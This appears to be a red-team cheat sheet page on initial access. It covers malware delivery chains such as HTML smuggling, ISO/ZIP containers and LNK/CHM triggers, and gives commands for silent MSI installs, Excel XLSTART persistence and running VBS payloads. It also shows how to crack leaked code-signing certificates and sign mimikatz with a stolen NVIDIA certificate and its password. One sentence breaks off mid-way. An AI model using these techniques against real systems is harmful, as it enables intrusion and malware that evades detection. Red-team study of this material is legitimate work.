initial-access.md (6816B)
1 --- 2 title: "Initial Access" 3 section: "Red Team" 4 sectionSlug: "redteam" 5 sourcePath: "docs/redteam/access/initial-access.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/access/initial-access.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Initial Access 12 13 > Initial Access Files in the context of a Red Team exercise refer to the set of files, scripts, executables, or documents used by the Red Team to initially infiltrate the target system or network. These files often contain malicious payloads or are designed to exploit specific vulnerabilities in order to establish a foothold in the target environment. 14 15 ## Summary 16 17 * [Complex Chains](#complex-chains) 18 * [Container](#container) 19 * [Payload](#payload) 20 * [Binary Files](#binary-files) 21 * [Code Execution Files](#code-execution-files) 22 * [Embedded Files](#embedded-files) 23 * [Code Signing](#code-signing) 24 25 ## Complex Chains 26 27 > DELIVERY(CONTAINER(TRIGGER + PAYLOAD + DECOY)) 28 29 * **DELIVERY**: means to deliver a pack full of files 30 * HTML Smuggling, SVG Smuggling, Attachments 31 * **CONTAINER**: archive bundling all infection dependencies 32 * ISO/IMG, ZIP, WIM 33 * **TRIGGER**: some way to run the payload 34 * LNK, CHM, ClickOnce applications 35 * **PAYLOAD**: the malware 36 * Binary Files 37 * Code Execution Files 38 * Embedded Files 39 * **DECOY**: used to continue pretext narration after detonating malware 40 * Typically open PDF files 41 42 Examples: 43 44 * HTML SMUGGLING(PASSWORD PROTECTED ZIP + ISO(LNK + IcedID + PNG)) used by [TA551/Storm-0303](https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/) 45 46 ## Container 47 48 * **ISO/IMG** - can contain hidden files, gets **automounted** giving easy access to contained files (`powershell –c .\malware.exe`) 49 * **ZIP** - can contain hidden files (locate ZIP + unpack it + change dir + run Malware) 50 * **WIM** - Windows Image, builtin format used to deploy system features 51 52 ```ps1 53 # Mount/Unmount .WIM 54 PS> Mount-WindowsImage -ImagePath myarchive.wim -Path "C:\output\path\to\extract" -Index 1 55 PS> Dismount-WindowsImage -Path "C:\output\path\to\extract" -Discard 56 ``` 57 58 * **7-zip, RAR, GZ** - should get a native support on Windows 11 59 60 ## Trigger 61 62 * **LNK** 63 * **CHM** 64 * **ClickOnce** 65 66 ## Payload 67 68 ### Binary Files 69 70 These files can be executed directly on the system without any third party. 71 72 * **.exe** file, executable file can be run with a click 73 * **.dll** file, execute with `rundll32 main.dll,DllMain` 74 75 ```c 76 #define WIN32_LEAN_AND_MEAN 77 #include <windows.h> 78 79 extern "C" __declspec(dllexport) 80 DWORD WINAPI MessageBoxThread(LPVOID lpParam) { 81 MessageBox(NULL, "Hello world!", "Hello World!", NULL); 82 return 0; 83 } 84 85 extern "C" __declspec(dllexport) 86 BOOL APIENTRY DllMain(HMODULE hModule, 87 DWORD ul_reason_for_call, 88 LPVOID lpReserved) { 89 switch (ul_reason_for_call) { 90 case DLL_PROCESS_ATTACH: 91 CreateThread(NULL, NULL, MessageBoxThread, NULL, NULL, NULL); 92 break; 93 case DLL_THREAD_ATTACH: 94 case DLL_THREAD_DETACH: 95 case DLL_PROCESS_DETACH: 96 break; 97 } 98 return TRUE; 99 } 100 ``` 101 102 * **.cpl** file, same as a .dll file with Cplapplet export 103 104 ```c 105 #include "stdafx.h" 106 #include <Windows.h> 107 108 extern "C" __declspec(dllexport) LONG Cplapplet( 109 HWND hwndCpl, 110 UINT msg, 111 LPARAM lParam1, 112 LPARAM lParam2 113 ) 114 { 115 MessageBoxA(NULL, "Hey there, I am now your control panel item you know.", "Control Panel", 0); 116 return 1; 117 } 118 119 BOOL APIENTRY DllMain( HMODULE hModule, 120 DWORD ul_reason_for_call, 121 LPVOID lpReserved 122 ) 123 { 124 switch (ul_reason_for_call) 125 { 126 case DLL_PROCESS_ATTACH: 127 { 128 Cplapplet(NULL, NULL, NULL, NULL); 129 } 130 case DLL_THREAD_ATTACH: 131 case DLL_THREAD_DETACH: 132 case DLL_PROCESS_DETACH: 133 break; 134 } 135 return TRUE; 136 } 137 ``` 138 139 ### Code Execution Files 140 141 * Word with Macro (.doc, .docm) 142 * Excel library (.xll) 143 * Excel macro-enabled add-in file (.xlam) 144 145 ```ps1 146 xcopy /Q/R/S/Y/H/G/I evil.ini %APPDATA%\Microsoft\Excel\XLSTART 147 ``` 148 149 * WSF files (.wsf) 150 * MSI installers (.msi) 151 152 ```ps1 153 powershell Unblock-File evil.msi; msiexec /q /i .\evil.msi 154 ``` 155 156 * MSIX/APPX app package (.msix, .appx) 157 * ClickOnce (.application, .vsto, .appref-ms) 158 * Powershell scripts (.ps1) 159 * Windows Script Host scripts (.wsh, .vbs) 160 161 ```ps1 162 cscript.exe payload.vbs 163 wscript payload.vbs 164 wscript /e:VBScript payload.txt 165 ``` 166 167 ### Embedded Files 168 169 * ICS Calendar Invites with Embedded Files 170 171 ## Code Signing 172 173 Certificate can be **Expired**, **Revoked**, **Valid**. 174 175 Many certificates leaked on the Internet and got re-used by Threat Actor. 176 Some of them can be found on VirusTotal, with the query : `content:{02 01 03 30}@4 AND NOT tag:peexe` 177 178 In 2022, LAPSUS$ claimed responsibility for a cyberattack on NVIDIA, a major graphics card and AI technology manufacturer. As part of this attack, LAPSUS$ allegedly stole proprietary data from NVIDIA and threatened to leak it. The leak contained 179 180 * Certificates can be password protected. Use [pfx2john.py](https://gist.github.com/tijme/86edd06c636ad06c306111fcec4125ba) 181 182 ```ps1 183 john --wordlist=/opt/wordlists/rockyou.txt --format=pfx pfx.hashes 184 ``` 185 186 * Sign a binary with a certificate. 187 188 ```ps1 189 osslsigncode sign -pkcs12 certs/nvidia-2014.pfx -in mimikatz.exe -out generated/signed-mimikatz.exe -pass nv1d1aRules 190 ``` 191 192 * The following files can be signed with a certificate 193 * executables: .exe, .dll, .ocx, .xll, .wll 194 * scripts: .vbs, .js, .ps1 195 * installers: .msi, .msix, .appx, .msixbundle, .appxbundle 196 * drivers: .sys 197 * cabinets: .cab 198 * ClickOnce: .application, .manifest, .vsto 199 200 ## References 201 202 * [Top 10 Payloads: Highlighting Notable and Trending Techniques - delivr.to](https://blog.delivr.to/delivr-tos-top-10-payloads-highlighting-notable-and-trending-techniques-fb5e9fdd9356) 203 * [Executing Code as a Control Panel Item through an Exported Cplapplet Function - @spotheplanet](https://www.ired.team/offensive-security/code-execution/executing-code-in-control-panel-item-through-an-exported-cplapplet-function) 204 * [Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach - x33fcon Youtube](https://youtu.be/CwNPP_Xfrts) 205 * [Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach - x33fcon PDF](https://binary-offensive.com/files/x33fcon%20-%20Desperate%20Infection%20Chains.pdf) 206 * [Red Macros Factory - https://binary-offensive.com/](https://binary-offensive.com/initial-access-framework)